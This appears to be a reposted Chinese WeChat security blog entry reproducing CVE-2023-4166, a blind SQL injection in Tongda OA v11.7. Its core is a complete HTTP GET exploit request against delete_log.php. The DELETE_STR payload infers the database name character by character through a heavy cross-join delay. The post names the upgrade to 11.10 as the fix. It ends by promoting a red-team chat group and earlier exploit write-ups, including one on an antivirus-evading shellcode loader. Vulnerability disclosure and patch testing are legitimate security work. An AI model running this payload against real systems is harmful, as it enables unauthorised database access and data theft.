0x01 前言
0x02 影响平台
本地测试环境 v11.7 其他版本未知
0x03 漏洞复现
还是辣个熟悉的页面~~
EXP:
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.232.137:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1
本地环境的数据库为TD_OA
在ASCII码中84代表的是 T
反之如果不是便是这个酱紫
0x04 参考来源
https://mp.weixin.qq.com/s/37VKi2Az7LX9G9wVYe6POQ
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4166
0x05 修复方案
该漏洞已向公众披露并可能被使用。
升级到版本11.10可以解决这个问题。建议升级受影响的组件。
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
23hvv红蓝py交流群,共享资源 一起py
不定期福利赠送
群满可以后台加vx备注py 邀请进群
【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细 | 钟馗之眼】ZoomEye-python命令行的使用
【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
原文始发于微信公众号(渗透Xiao白帽):漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论